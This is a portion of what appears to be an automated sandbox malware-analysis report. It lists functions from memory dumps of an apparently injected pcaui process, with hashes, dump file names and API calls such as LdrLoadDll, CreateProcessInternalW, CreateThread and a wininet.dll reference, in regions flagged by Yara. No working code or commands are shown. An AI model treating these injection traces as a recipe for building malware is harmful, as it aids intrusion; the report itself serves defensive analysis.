                                                                                                                        • Opcode ID: 8cd8e60e30d7514be6d16abb083d0cb88e9cd589c71863ef0da0875d3c8d9490
                                                                                                                        • Instruction ID: fe4ac933edf326b3a849109c5042c5e6dd1216376a0968227272f39de8c07fdd
                                                                                                                        • Opcode Fuzzy Hash: 8cd8e60e30d7514be6d16abb083d0cb88e9cd589c71863ef0da0875d3c8d9490
                                                                                                                        • Instruction Fuzzy Hash: 4690026238140443E10071589454B0A1015CBE2301FD5C015E5064554D8719CE52622B
                                                                                                                        Function 05002FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 816869c767beace4c2605f6da597e0281bb9646fe163528813c5153ae04f3fa0
                                                                                                                        • Instruction ID: 6e916fb7804589ae061e7d86038efe5dbe00956f598c59bf3ce2f8b50795bee0
                                                                                                                        • Opcode Fuzzy Hash: 816869c767beace4c2605f6da597e0281bb9646fe163528813c5153ae04f3fa0
                                                                                                                        • Instruction Fuzzy Hash: DE9002226414004351407168D88490A5015AFE22117D5C121A4998550D86598A65576A
                                                                                                                        Function 05002FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8d54f48b45749287bfb55da42d3f83be72df910373b0798b83f7be911229e7eb
                                                                                                                        • Instruction ID: b25287db065c0c7ed01a918c127de0a34fc4e9de00aad46a2e994e6759f39edd
                                                                                                                        • Opcode Fuzzy Hash: 8d54f48b45749287bfb55da42d3f83be72df910373b0798b83f7be911229e7eb
                                                                                                                        • Instruction Fuzzy Hash: CF900222251C0043E20075689C54B0B10158BD1303FD5C115A4154554CCA158A615626
                                                                                                                        Function 05002E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6e0d986eb5edde4d8aa053d7ac86a8b20225e31f8f13b72c0a9194dc8088db9a
                                                                                                                        • Instruction ID: 9632f98ffdfaf8ed8603be3bad001a85c1e9b88a881cf4152b41fdee26ff9a76
                                                                                                                        • Opcode Fuzzy Hash: 6e0d986eb5edde4d8aa053d7ac86a8b20225e31f8f13b72c0a9194dc8088db9a
                                                                                                                        • Instruction Fuzzy Hash: 5C90022264140503E1017158944461A101A8BD1241FD5C022A5024555ECB258B92A236
                                                                                                                        Function 05002EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: bbb7ed03977811954283152d22afbdbf4330b064a12236617f3f9469899b7387
                                                                                                                        • Instruction ID: 51481d8a3fd624b0762f0bce4faed59b649accf883b8d63c465906f1b3d9054b
                                                                                                                        • Opcode Fuzzy Hash: bbb7ed03977811954283152d22afbdbf4330b064a12236617f3f9469899b7387
                                                                                                                        • Instruction Fuzzy Hash: 9990026224180403E1407558984460B10158BD1302FD5C011A6064555E8B298E51623A
                                                                                                                        Function 05002B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 848e2d08c3f8919e4d1cc19b94e76f6650738a1ba53782dbe5bd7689ff268cfd
                                                                                                                        • Instruction ID: 8e2c0c840f8210d2a20defe3fd50d43ad107d6eccc06a281d53f732785b2fe84
                                                                                                                        • Opcode Fuzzy Hash: 848e2d08c3f8919e4d1cc19b94e76f6650738a1ba53782dbe5bd7689ff268cfd
                                                                                                                        • Instruction Fuzzy Hash: 7B9002622424000351057158945461A501A8BE1201BD5C021E5014590DC6258A91622A
                                                                                                                        Function 05002BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 27830bdd49e4014a2d1851272d1b4c7b833166515f4139647942327ce8bdb4e8
                                                                                                                        • Instruction ID: a6a6ed9ac8675a01f6e8704eae6209b38902598727c8da79d4b9695d77c4a61d
                                                                                                                        • Opcode Fuzzy Hash: 27830bdd49e4014a2d1851272d1b4c7b833166515f4139647942327ce8bdb4e8
                                                                                                                        • Instruction Fuzzy Hash: D690023264540803E1507158945474A10158BD1301FD5C011A4024654D87558B5577A6
                                                                                                                        Function 05002BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1c8d9f52bd2d81d6d11a57839ff2b44c3fdeab0a6419942a31afb4604889d019
                                                                                                                        • Instruction ID: 0bd922e8ff22ecb9fba6a4af7077b77c2072cc8d14c998939931efd3f8c48062
                                                                                                                        • Opcode Fuzzy Hash: 1c8d9f52bd2d81d6d11a57839ff2b44c3fdeab0a6419942a31afb4604889d019
                                                                                                                        • Instruction Fuzzy Hash: 8F90023224544843E14071589444A4A10258BD1305FD5C011A4064694D97258F55B766
                                                                                                                        Function 05002BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d7bc368ddd45669b6d8044b2fa28b2cd5f29977daab7cc2a50e18a8a54d71157
                                                                                                                        • Instruction ID: 20386aeedc3b382980db2f34082b0b33945bd751bc7727f80e5343877188a4e7
                                                                                                                        • Opcode Fuzzy Hash: d7bc368ddd45669b6d8044b2fa28b2cd5f29977daab7cc2a50e18a8a54d71157
                                                                                                                        • Instruction Fuzzy Hash: 8090023224140803E1807158944464E10158BD2301FD5C015A4025654DCB158B5977A6
                                                                                                                        Function 05002AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6f4bfe416009e394ed3a92f82360133c8bd14c0c30027aa114e778d445328a2c
                                                                                                                        • Instruction ID: 784be16d754d99afd4db80b59c0feb0c79d674a6130f97e8e98bd49b177eb109
                                                                                                                        • Opcode Fuzzy Hash: 6f4bfe416009e394ed3a92f82360133c8bd14c0c30027aa114e778d445328a2c
                                                                                                                        • Instruction Fuzzy Hash: 99900226251400031105B558574450B10568BD63513D5C021F5015550CD7218A615226
                                                                                                                        Function 05002AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 92e5a6cd9325c5b51a5eaee63631e03094b6d3af55d225f9f5deb8ca94ffb23d
                                                                                                                        • Instruction ID: c61b1d72143a38bf53c7133ea8f3b9e16fe30443aa7241679dea4efc3a734761
                                                                                                                        • Opcode Fuzzy Hash: 92e5a6cd9325c5b51a5eaee63631e03094b6d3af55d225f9f5deb8ca94ffb23d
                                                                                                                        • Instruction Fuzzy Hash: AE900226261400031145B558564450F14559BD73513D5C015F5416590CC7218A655326
                                                                                                                        Function 050035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 587ded098b47cb3af796c6b8be897b8d055dc3c6cd2676799acbe51b6ecb0f35
                                                                                                                        • Instruction ID: 68b47734019e62cd0c71480e0ff52364eab6d187910103144df1353c447a3a8e
                                                                                                                        • Opcode Fuzzy Hash: 587ded098b47cb3af796c6b8be897b8d055dc3c6cd2676799acbe51b6ecb0f35
                                                                                                                        • Instruction Fuzzy Hash: F290023264550403E1007158955470A20158BD1201FE5C411A4424568D87958B5166A7
                                                                                                                        Function 050039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d422732ad57cf876448d7f08c9bca34447ac08ec2444a7986a7722c80187b8b1
                                                                                                                        • Instruction ID: 18e0016671900c5056471e12b2357609b67b42432341eafbc3e85d468b0f60a1
                                                                                                                        • Opcode Fuzzy Hash: d422732ad57cf876448d7f08c9bca34447ac08ec2444a7986a7722c80187b8b1
                                                                                                                        • Instruction Fuzzy Hash: 5490022228545103E150715C944461A5015ABE1201FD5C021A4814594D86558A556326
                                                                                                                        Function 02D7F830 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                                                        • Instruction ID: 0fc8d00b0037ccf50f678bf2abfcedfea7c000fd343e92442eb99f2ef5ff70c7
                                                                                                                        • Opcode Fuzzy Hash: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                                                        • Instruction Fuzzy Hash: AB311EB5A0020AAFDB10DFD8D8809EEB7B9FF88304B108559E515EB314D775AE05CBA0
                                                                                                                        Function 02D7F829 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                                                        • Instruction ID: 91c3e89ab1a5ba1a8dcff09dbceff7ecfd4d41195ae462ec8dfd2a839bb51f14
                                                                                                                        • Opcode Fuzzy Hash: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                                                        • Instruction Fuzzy Hash: 45312DB6A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E515EB314D775AE05CBA0
                                                                                                                        Function 02D83D60 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02D83E3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: wininet.dll
                                                                                                                        • API String ID: 3472027048-3354682871
                                                                                                                        • Opcode ID: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                                                        • Instruction ID: 471098ad4c3c6fcc5932a421023346ee0a78f3ba2e5dd0c8329cdd0425d2a3f6
                                                                                                                        • Opcode Fuzzy Hash: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                                                        • Instruction Fuzzy Hash: 12316EB1605705ABD714EFA4CC80FEBB7B9EB88B14F00455DE65DAB380D370AA41CBA5
                                                                                                                        Function 02D748C0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D74932
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction ID: a78f9432dd770fc24566d3837f6af15761b0e3c405305e81e479d1466638a0e6
                                                                                                                        • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction Fuzzy Hash: F3011EB9D0020EABDF14EBE4EC41FAEB779AB44308F004195A91897241F635EB58CBA1
                                                                                                                        Function 02D89BF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02D7868E,00000010,?,?,?,00000044,?,00000010,02D7868E,?,?,?), ref: 02D89C53
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        • Opcode ID: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                                                        • Instruction ID: bc6d4cee70d29281e06361b52f93c351dc0e1a4fbbcce1e1070782f2ce7e2bcc
                                                                                                                        • Opcode Fuzzy Hash: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                                                        • Instruction Fuzzy Hash: 2B0180B2214509BBCB54DE99DC80EEB77ADEF8C754F508108BA0DE3250D630FC518BA4
                                                                                                                        Function 02D69DB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D69DF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                                                        • Instruction ID: 327727fd4c334870252faf656dfd7b142b00aaca9ec5ec19d3398405fb284fcc
                                                                                                                        • Opcode Fuzzy Hash: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                                                        • Instruction Fuzzy Hash: 56F0397339120436E22075E99C02FE7B28DCB82BA1F140066F60DEA6C0D9A2B90186B5
                                                                                                                        Function 02D69DAA Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D69DF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                                                        • Instruction ID: d4cbd4ce0bfc6e027d6962a236e25e6c805d5d062bf60d5c4e03a55f6c3b7608
                                                                                                                        • Opcode Fuzzy Hash: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                                                        • Instruction Fuzzy Hash: BCF06D733513007BE23076A98C46FDB775DCF82B61F140156F60AEB6C1DAA2B9428BB5
                                                                                                                        Function 02D89B60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02D74138,000000F4), ref: 02D89B9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction ID: c9701e4ce4e03af69dbb620c7d1d389f6d5eb413e26d91b2126eca7d2e8bcf7a
                                                                                                                        • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction Fuzzy Hash: 96E032B6210208BBD614EA99DC44FEB73ADEBC9710F004019B908A7241D630B8108AB8
                                                                                                                        Function 02D89B10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02D71D99,?,02D86223,02D71D99,02D8596F,02D86223,?,02D71D99,02D8596F,00001000,?,?,00000000), ref: 02D89B4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction ID: ab3996ff457b3f041c58b972385279a95c83954e5dee7e4cfcb78962380d8c0a
                                                                                                                        • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction Fuzzy Hash: 77E065B2200208BBD610EF98EC84FAB77ADEFC8710F00440AF908A7380D670BD118BB4
                                                                                                                        Function 02D786D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02D786FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
